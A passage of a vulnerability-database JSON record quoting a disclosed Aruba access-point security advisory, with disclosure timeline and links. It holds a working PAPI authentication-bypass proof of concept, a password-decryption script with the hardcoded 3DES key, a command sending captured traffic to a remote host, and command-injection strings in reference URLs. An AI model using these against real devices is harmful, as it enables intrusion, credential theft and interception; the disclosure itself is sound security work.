looks as follows:\n\n  HTTP/1.1 200 OK\n  Date: Wed, 11 Nov 2015 13:18:58 GMT\n  Content-Length: 552\n  Content-Type: text/plain; charset=UTF-8\n  X-Activation-Key: FXXXXXXX\n  X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e\n  X-Status-Code: success\n  X-Type: firmware-check\n  Connection: close\n\n\n  6.4.2.6-4.1.1.10_51810\n  25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810\n  30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810\n  15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810\n  10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810\n  23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810\n  26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810\n\nAn attacker could potentially MiTM connections to images.arubanetworks.com and\npossibly replace the firmware images downloaded by the AP. \n\n----------------------------------------------------------------------\n18. AP: Firmware update Challenge/Response does not protect the Client\n----------------------------------------------------------------------\n\nThe update check process between AP and device.arubanetworks.com works\nas follows:\n\n  AP =\u003e device.arubanetworks.com\n  POST /firmware\n  X-Type: firmware-check\n\n  AP \u003c= device.arubanetworks.com\n        200 OK\n        X-Session-Id: bd4... \n        X-Challenge: 123123... \n\n  AP =\u003e device.arubanetworks.com\n  POST /firmware\n  X-Session-Id: bd4... \n\n  [machine certificate]\n  [signature]\n\n  AP \u003c= device.arubanetworks.com\n        200 OK\n        X-Session-Id: bd4... \n\n        [firmware image urls]\n\nWhen inspecting the communication process carefully, it is clear that the final\nresponse from device.arubanetworks.com does not contain any (cryptographic)\nsignature. An attacker could impersonate device.arubanetworks.com, send an\narbitrary challenge, ignore the response and just reply with a list of firmware\nimages. The only thing that has to be kept the same over requests is the\nX-Session-Id header, which is also sent initially by the remote host and not\nthe AP and therefore under full control of the attacker. \n\n------------------------------------------\n19. AP: Unencrypted private keys and certs\n------------------------------------------\n\nThe AP firmware image contains the unencrypted private key and certificate for\nsecurelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key\nand cert was found under the path /aruba/conf/cpprivkey.pem. \n\n  $ openssl x509 -in cpprivkey.pem -text -noout\n  Certificate:\n      Data:\n          Version: 3 (0x2)\n          Serial Number: 121426 (0x1da52)\n      Signature Algorithm: sha1WithRSAEncryption\n          Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL,\nCN=GeoTrust DV SSL CA\n          Validity\n              Not Before: May 11 01:22:10 2011 GMT\n              Not After : Aug 11 04:40:59 2017 GMT\n          Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF,\nC=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See\nwww.geotrust.com/resources/cps (c)11, OU=Domain Control Validated -\nQuickSSL(R) Premium, CN=securelogin.arubanetworks.com\n  [...]\n\n  $ openssl rsa -in cpprivkey.pem -check\n  RSA key ok\n  writing RSA key\n  -----BEGIN RSA PRIVATE KEY-----\n  MIIEpQIBAAKCAQEA\u2026. \n  [...]\n  -----END RSA PRIVATE KEY-----\n\n---------------------------------------\n20. AP: Potential signature private key\n---------------------------------------\n\nA potential SSL key was found under the path /etc/sig.key. Based on the header\n(3082xxxx[02,03]82), the file looks like a SSL key in DER format:\n\n$ xxd etc/sig.key\n00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb  0.........-q.... \n\nIt was not possible to decode the key. Therefore it\u0027s not 100% clear if is an\nactual key or just a garbaged file. \n\n------------------------------------------------\n21. AP: PAPI Endpoints exposed to all interfaces\n------------------------------------------------\n\nThe PAPI endpoint \"msgHandler\" creates listeners on all interfaces. Therefore\nit is reachable via wired and wireless connections to the AP. This increases\nthe potential attack surface. \n\n  # netstat -nlu | grep :82\n  udp        0      0 :::8209                 :::*\n  udp        0      0 :::8211                 :::*\n\nAdditionally the local ACL table of the AP contains a default firewall rule,\npermitting any traffic to udp/8209-8211, overwriting any manually set ACL to\nblock access to PAPI:\n\n  00:0b:86:XX:XX:XX# show datapath acl 106\n  Datapath ACL 106 Entries\n  -----------------------\n  Flags: P - permit, L - log, E - established, M/e - MAC/etype filter\n        S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror\n        I - Invert SA, i - Invert DA, H - high prio, O - set prio, C -\nClassify Media\n        A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6\n        K - App Throttle, d - Domain DA\n  ----------------------------------------------------------------\n   1:  any  any  17 0-65535 8209-8211  P4\n  [...]\n  12:  any  any  any  P4\n  00:0b:86:XX:XX:XX#\n\n------------------------------------------------------\n22. AP: PAPI Endpoint does not validate MD5 signatures\n------------------------------------------------------\n\nMD5 signature validation for incoming PAPI packets is disabled on the AP:\n\n  # ps | grep msgHandler\n   1988 root        508 S \u003c /aruba/bin/msgHandler -n\n\n  # /aruba/bin/msgHandler -h\n  usage: msgHandler [-d] [-n]\n  -d = enable debug prints. \n  -n = disable md5 signatures. \n  -g = disable garbling. \n\nThe watchdog service (\"nanny\") also restarts the PAPI handler with disabled MD5\nsignature validation:\n\n  # grep msgH /aruba/bin/nanny_list\n  RESTART /aruba/bin/msgHandler -n\n\n--------------------------------------------------------------\n23. AP: PAPI protocol encrypted with weak encryption algorithm\n--------------------------------------------------------------\n\nPAPI packets sent to an AP contain an encrypted payload. The encryption seems\nto replace the MD5 signature check as described in #4 and used when PAPI is\nsent from AP to AMP. This might also explain why the PAPI endpoint runs with\ndisabled MD5 signature verification on the AP (see #22). \n\nThe following example shows an encrypted PAPI packet for the command\n\"show version\" as received by the AP:\n\n  0000  49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13   Ir............ \n  0010  3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00   ;`;~ ........... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93   ................ \n  0050  a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97   .....n.......... \n  0060  93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd   ................ \n  0070  fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb   ................ \n  0080  fc e4 b3 e5 f6 e1 e0 fa fc fd 99                  ........... \n\nImportant parts of the above packet:\n\n  7f 00 00 01         Destination IP (127.0.0.1)\n  0a 00 00 01         Source IP (10.0.0.1)\n  3b 60               Destination Port (15200)\n  3b 7e               Source Port (15230)\n  97 93 93 93-EOF     Encrypted PAPI payload\n\nComparison of the above packet with a typical PAPI packet that is sent from the\nAP to the AMP quickly highlights the missing 0x00 that are used to pad certain\nfields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which\nis a clear indication that the payload is \"encrypted\" with a 1 byte XOR. As\nXOR\u0027ing 0x00 with 1 byte results in the same byte, the payload therefore\ndiscloses the key used and use of the weak XOR algorithm:\n\n    0x00: 00000000\n  ^ 0x93: 10010011\n  ================\n          10010011 (0x93)\n\nThe following shows the above PAPI packet for \"show version\" with its payload\ndecrypted:\n\n  0000  49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13   Ir............ \n  0010  3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00   ;`;~ ........... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00   ................ \n  0050  3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04   :............... \n  0060  00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e   .......zxroCOUwn\n  0070  69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68   irdzB5dtVxb...sh\n  0080  6f 77 20 76 65 72 73 69 6f 6e 0a                  ow version. \n\n(The string starting with \"zxr...\" is a HTTP session ID, see #25 on details how\nto bypass this). \n\nAn example Python function for en-/decrypting PAPI payloads could look like\nthis:\n\n  def aruba_encrypt(s):\n    return \u0027\u0027.join([chr(ord(c) ^ 0x93) for c in s])\n\n-------------------------------------------\n24. AP: PAPI protocol authentication bypass\n-------------------------------------------\n\nBesides it\u0027s typical use between different Aruba devices, PAPI is also used as\nan inter-process communication (IPC) mechanism between the CGI based web\nfrontend and the backend processes on the AP. Certain commands that can be sent\nvia PAPI are only supposed to be used via this IPC interface and not from an\nexternal source. Besides the weak \"encryption\" that is described in #23, some\nPAPI packets contain a HTTP session ID (SID), that matches the SID issued at\nlogin to the web frontend. \n\nExample IPC packet (payload decrypted as shown in #23):\n\n  0000  49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13   Ir............ \n  0010  3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00   ;`;~ ........... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00   ................ \n  0050  40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04   @............... \n  0060  00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e   .......zxroCOUwn\n  0070  69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68   irdzB5dtVxb...sh\n  0080  6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e   ow configuration\n  0090  0a                                                . \n\nThe SID in the example shown is \"zxroCOUwnirdzB5dtVxb\". The 0x14 before that\nindicates the length of the 20 byte SID. If the session is expired or an\ninvalid session is specified, the packet is rejected by the PAPI endpoint\n(msgHandler). \n\nReplacing the 20 byte SID with 20 * 0x00, bypasses the SID check and therefore\nallows unauthenticated PAPI communication with the AP. \n\nExample IPC packet (Session ID replaced with 20 * 0x00, payload not XOR\u0027ed for\nreadability):\n\n  0000  49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13   Ir............ \n  0010  3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00   ;`;~ ........... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00   ................ \n  0050  40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04   @............... \n  0060  00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00   ................ \n  0070  00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68   ..............sh\n  0080  6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e   ow configuration\n  0090  0a\n\nUsing the above example, it is possible to request the system configuration\nfrom an AP, bypassing all authentication methods. \n\nIf the above packet is sent using IPC from the webfrontend cgi to the backend,\n(localhost) the reply looks like follows:\n\nmsg_ref 303 /tmp/.cli_msg_SW9iVE\n\nThe cgi binary then reads this file and renders the content in the HTTP reply. \nIf the PAPI packet comes from an external address (instead of localhost) the\nreply points to the APs web server (10.0.0.26 in this case) instead of /tmp/:\n\nmsg_ref 2689 http://10.0.0.26/.cli_msg_n011xh\n\nAccess to this file does not require authentication which raises the severity\nof this vulnerability significantly. \n\nThe following Python script is a proof of concept for this vulnerability,\nsending a \"show configuration\" packet to an AP with the IP address 10.0.0.26:\n\n  import socket\n  def aruba_encrypt(s):\n    return \u0027\u0027.join([chr(ord(c) ^ 0x93) for c in s])\n  header = (\n    \u0027\\x49\\x72\\x00\\x03\\x7f\\x00\\x00\\x01\\x0a\\x00\\x00\\x01\\x00\\x00\\x20\\x13\u0027\n    \u0027\\x3b\\x60\\x3b\\x7e\\x20\\x04\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n  )\n  payload = (  # show configuration\n    \u0027\\x04\\x00\\x00\\x00\\x40\\x04\\x00\\x00\\x01\\xfd\\x05\\x0a\\x00\\x00\\x01\\x06\u0027\n    \u0027\\x07\\x02\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027\n    \u0027\\x00\\x13\\x73\\x68\\x6f\\x77\\x20\\x63\\x6f\\x6e\\x66\\x69\\x67\\x75\\x72\\x61\u0027\n    \u0027\\x74\\x69\\x6f\\x6e\\x0a\u0027\n  )\n  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n  sock.bind((\u0027\u0027, 1337))\n  sock.sendto(header + aruba_encrypt(payload), (\u002710.0.0.26\u0027, 8211))\n  buff = sock.recvfrom(4096)\n  print aruba_encrypt(buff[0])\n\nExecuting the above PoC:\n\n  # python arupapi.py\n  [...]msg_ref 2689 http://10.0.0.26/.cli_msg_n011xh\n\nDownloading the file referenced by the reply returns the full AP configuration,\nincluding all users, passwords and settings (no auth is required on the HTTP\nrequest either):\n\n  # curl -Lk http://10.0.0.26/.cli_msg_n011xh\n  version 6.4.2.0-4.1.1\n  virtual-controller-country XX\n  virtual-controller-key b49ff***REMOVED***\n  name instant-XX:XX:XX\n  terminal-access\n  clock timezone none 00 00\n  rf-band all\n  [...]\n  mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa\n  [...]\n  (full configuration file continues)\n\nFor APs running in \"managed mode\", the above shown exploit does not work. The\nreason for that is, that these APs don\u0027t provide a web server and have only a\nlimited set of commands that can be executed via PAPI. \n\nAdditionally, APs in managed mode do not seem to use the XOR based \"encryption\"\nor MD5 checksums - there was no authentication/encryption found at all. \n\nOne interesting payload for APs in \"managed mode\" using the limited subset of\navailable commands is the ability to capture traffic and send it to a remote\nendpoint via UDP. The example command on the controller would be:\n\n  (aruba_7030_1) #ap packet-capture raw-start ip-addr 192.168.0.1\n100.105.134.45 1337 0 radio 0\n\nThis command would send all traffic of AP 192.168.0.1 from the first radio\ninterface in PCAP format to 100.105.134.45:1337. Wrapped in PAPI, the Packet\nwould look like this:\n\n  0000  49 72 00 03 c0 a8 00 01 7f 00 00 01 00 00 00 00   Ir.............. \n  0010  20 21 20 1c 20 04 01 48 14 08 36 b1 00 00 00 00    ! . ..H..6..... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 65   ...............e\n  0050  78 65 63 75 74 65 43 6f 6d 6d 61 6e 64 4f 62 6a   xecuteCommandObj\n  0060  65 63 74 02 06 02 04 03 00 08 03 00 08 00 00 04   ect............. \n  0070  38 32 32 35 02 06 02 04 00 00 00 03 00 00 02 00   8225............ \n  0080  02 01 04 00 00 00 08 00 00 02 41 50 00 00 02 41   ..........AP...A\n  0090  50 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54 55   P...PACKET-CAPTU\n  00a0  52 45 00 00 0e 50 41 43 4b 45 54 2d 43 41 50 54   RE...PACKET-CAPT\n  00b0  55 52 45 00 00 09 52 41 57 2d 53 54 41 52 54 00   URE...RAW-START. \n  00c0  00 09 52 41 57 2d 53 54 41 52 54 00 00 07 49 50   ..RAW-START...IP\n  00d0  2d 41 44 44 52 00 00 0b 31 39 32 2e 31 36 38 2e   -ADDR...192.168. \n  00e0  30 2e 31 00 00 09 74 61 72 67 65 74 2d 69 70 00   0.1...target-ip. \n  00f0  00 0e 31 30 30 2e 31 30 35 2e 31 33 34 2e 34 35   ..100.105.134.45\n  0100  00 00 0b 74 61 72 67 65 74 2d 70 6f 72 74 00 00   ...target-port.. \n  0110  04 31 33 33 37 00 00 06 66 6f 72 6d 61 74 00 00   .1337...format.. \n  0120  01 30 00 00 05 52 41 44 49 4f 00 00 01 30 04 00   .0...RADIO...0.. \n  0130  00 00 00 02 00 02 01 02 00 02 00 00 00 04 73 65   ..............se\n  0140  63 61 00 00 04 72 6f 6f 74                        ca...root\n\nWhen sending this packet to an AP running in managed mode, it confirms the\ncommand and starts sending traffic to the specified host:\n\n  [...]\u003cre\u003e\u003cdata name=\"Packet capture has started for pcap-id\"\npn=\"true\"\u003e1\u003c/data\u003e\u003c/re\u003e\n\n---------------------------------------------------------\n25. AP: Broadcast with detailed system information (LLDP)\n---------------------------------------------------------\n\nAruba APs broadcast detailed system and version information to the wired\nnetworks via LLDP (Link Layer Discovery Protocol). \n\n  0000   02 07 04 00 0b 86 9e 7a 32 04 07 03 00 0b 86 9e  .......z2....... \n  0010   7a 32 06 02 00 78 0a 11 30 30 3a 30 62 3a 38 36  z2...x..00:0b:86\n  0020   3a XX XX 3a XX XX 3a XX XX 0c 3a 41 72 75 62 61  :XX:XX:XX.:Aruba\n  0030   4f 53 20 28 4d 4f 44 45 4c 3a 20 52 41 50 2d 31  OS (MODEL: RAP-1\n  0040   35 35 29 2c 20 56 65 72 73 69 6f 6e 20 36 2e 34  55), Version 6.4\n  0050   2e 32 2e 36 2d 34 2e 31 2e 31 2e 31 30 20 28 35  .2.6-4.1.1.10 (5\n  0060   31 38 31 30 29 0e 04 00 0c 00 08 10 0c 05 01 0a  1810)........... \n  0070   00 00 22 02 00 00 00 0e 00 08 04 65 74 68 30 fe  ..\"........eth0. \n  0080   06 00 0b 86 01 00 01 fe 09 00 12 0f 03 00 00 00  ................ \n  0090   00 00 fe 09 00 12 0f 01 03 6c 03 00 10 fe 06 00  .........l...... \n  00a0   12 0f 04 06 76 00 00                             ....v.. \n\nThe broadcast packet contains the APs MAC address, model number and exact\nfirmware version.This detailed information could aid an attacker to easily find\nand identify potential targets for known vulnerabilities. \n\n------------------------------------------------------\n26. AP: User passwords are encrypted with a static key\n------------------------------------------------------\n\nBased on the vulnerability shown in #24 which potentially discloses the\npassword hashes of AP user accounts, the implemented hashing algorithm was\ntested. CVE-2014-7299 describes the password hashes as \"encrypted password\nhashes\". The following line shows the mgmt-user configuration for the user\n\"admin\" with password \"admin\":\n\n  mgmt-user admin f9ac59cd431e174fb07539a8a811a1aa\n\nSome testing with various passwords and especially password lengths showed that\nthe passwords are actually encrypted and not hashed (as hash algorithms produce\nthe same length output for different length input):\n\n  f9ac59cd431e174fb07539a8a811a1aa                 # admin\n  d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf # adminadmin\n\nThe encryption algorithm used for the above passwords turned out to be 3DES in\nCBC mode. The encryption algorithm uses a 24 byte static key which is hardcoded\non the AP. Sampling of different Firmware versions confirmed that the key is\nidentical for all available versions. The IV required for 3DES consists of 8\nrandom bytes, and is stored as the first 8 byte of the encrypted password. The\nfollowing Python script can be used to decrypt the above hashes:\n\n  import pyDes\n  hashes = (\n    \u0027f9ac59cd431e174fb07539a8a811a1aa\u0027, # admin\n    \u0027d7a75c655b8e2fb8609d0b04275e02767f2dfae8c63088cf\u0027 # adminadmin\n  )\n  key = (\n    \u0027\\x32\\x74\\x10\\x84\\x91\\x17\\x75\\x46\\x14\\x75\\x82\\x92\u0027\n    \u0027\\x43\\x49\\x04\\x59\\x18\\x69\\x15\\x94\\x27\\x84\\x30\\x03\u0027\n  )\n  for h in hashes:\n    d = pyDes.triple_des(key, pyDes.CBC, h.decode(\u0027hex\u0027)[:8], pad=\u0027\\00\u0027)\n    print h, \u0027=\u003e\u0027, d.decrypt(h.decode(\u0027hex\u0027)[8:])\n\nMitigation\n==========\nAruba released three advisories, related to the issues reported here:\n\n  http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-004.txt\n  http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt\n  http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-006.txt\n\nFollowing the resolution advises given in those advisories is strongly\nrecommended. These advisories are also available on the Aruba security bulletin:\n\n  http://www.arubanetworks.com/support-services/security-bulletins/\n\nFor the vulnerabilities related to PAPI, Aruba has made the following document\navailable:\n\n  http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/Control_Plane_Security_Best_Practices_1_0.pdf\n\nThis doc gives several advises how to remediate the PAPI related\nvulnerabilities. An update fixing the issues is announced for Q3/2016. \nFor further information there is also a discussion thread in Aruba\u0027s Airheads\nCommunity Forum:\n\n  http://community.arubanetworks.com/t5/AAA-NAC-Guest-Access-BYOD/Security-vulnerability-advisories/m-p/266095#M25840\n\nAuthor\n======\nThe vulnerabilities were discovered by Sven Blumenstein from Google Security\nTeam. \n\n\nTimeline\n========\n2016/01/22 - Security report sent to sirt@arubanetworks.com with 90 day\n             disclosure deadline (2016/04/22). \n2016/01/22 - Aruba acknowledges report and starts working on the issues. \n2016/02/01 - Asking Aruba for ETA on detailed feedback. \n2016/02/03 - Detailed feedback for all reported vulnerabilities received. \n2016/02/16 - Answered several questions from the feedback, asked Aruba for\n             patch ETA. \n2016/02/29 - Pinged for patch ETA. \n2016/03/08 - Pinged for patch ETA. \n2016/03/12 - Received detailed list with approx. ETA for patch releases and\n             current status. \n2016/03/21 - Aruba asks for extension of 90 day disclosure deadline. \n2016/03/24 - Asked Aruba for exact patch release dates. \n2016/04/02 - Aruba confirmed 4.2.x branch update for 2016/04/15, 4.1.x branch\n             update for 2016/04/30 (past 90 day deadline). \n2016/04/14 - 14 day grace period for disclosure was granted, according to\n             the disclosure policy. New disclosure date was set to 2016/05/06. \n2016/05/02 - Asking for status of still unreleased \u0027end of April\u0027 update. \n2016/05/02 - Aruba confirmed availability of update on 2016/05/09 (after grace\n             period). \n2016/05/03 - Aruba released three advisories on\nhttp://www.arubanetworks.com/support-services/security-bulletins/\n2016/05/06 - Public disclosure",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-2031"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "PACKETSTORM",
        "id": "136997"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-2031",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "90207",
        "trust": 1.9
      },
      {
        "db": "PACKETSTORM",
        "id": "136997",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-431802",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-20-315-05",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4046",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-362",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2031"
      }
    ]
  },
  "id": "VAR-202001-1251",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.13247864
  },
  "last_update_date": "2022-05-04T09:26:12.685000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ARUBA-PSA-2016-004",
        "trust": 0.8,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-004.txt"
      },
      {
        "title": "Aruba Networks ArubaOS , AirWave Management Platform  and Instant Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=62934"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2031"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-004.txt"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2016/may/19"
      },
      {
        "trust": 1.6,
        "url": "https://packetstormsecurity.com/files/136997/aruba-authentication-bypass-insecure-transport-tons-of-issues.html"
      },
      {
        "trust": 1.6,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-431802.pdf"
      },
      {
        "trust": 1.6,
        "url": "https://www.securityfocus.com/bid/90207"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2031"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2031"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4046/"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-315-05"
      },
      {
        "trust": 0.1,
        "url": "https://www.geotrust.com/resources/cps"
      },
      {
        "trust": 0.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-005.txt"
      },
      {
        "trust": 0.1,
        "url": "http://community.arubanetworks.com/t5/aaa-nac-guest-access-byod/security-vulnerability-advisories/m-p/266095#m25840"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_aries_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_pegasus_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_centaurus_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2032"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.xx.xx/?\"`/sbin/utelnetd`\""
      },
      {
        "trust": 0.1,
        "url": "http://www.arubanetworks.com/support-services/security-bulletins/"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.26/.cli_msg_n011xh"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_taurus_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7299"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_cassiopeia_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.1/?\"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-c+/etc/mini_httpd.conf`\"\u0026auto_reboot=false\u0026refresh=true\u0026sid=owsiu5mm7dxvf9frwe3p\u0026nocache=0.9368100591919084"
      },
      {
        "trust": 0.1,
        "url": "http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/control_plane_security_best_practices_1_0.pdf"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-0932"
      },
      {
        "trust": 0.1,
        "url": "https://10.0.xx.xx:4343/"
      },
      {
        "trust": 0.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-006.txt"
      },
      {
        "trust": 0.1,
        "url": "http://images.arubanetworks.com/fwfiles/arubainstant_orion_6.4.2.6-4.1.1.10_51810"
      },
      {
        "trust": 0.1,
        "url": "http://community.arubanetworks.com/t5/unified-wired-wireless-access/os5-0-support-password/td-p/26760"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.1:4321/arubainstant_aries_6.4.2.6-4.1.1.10_51810"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
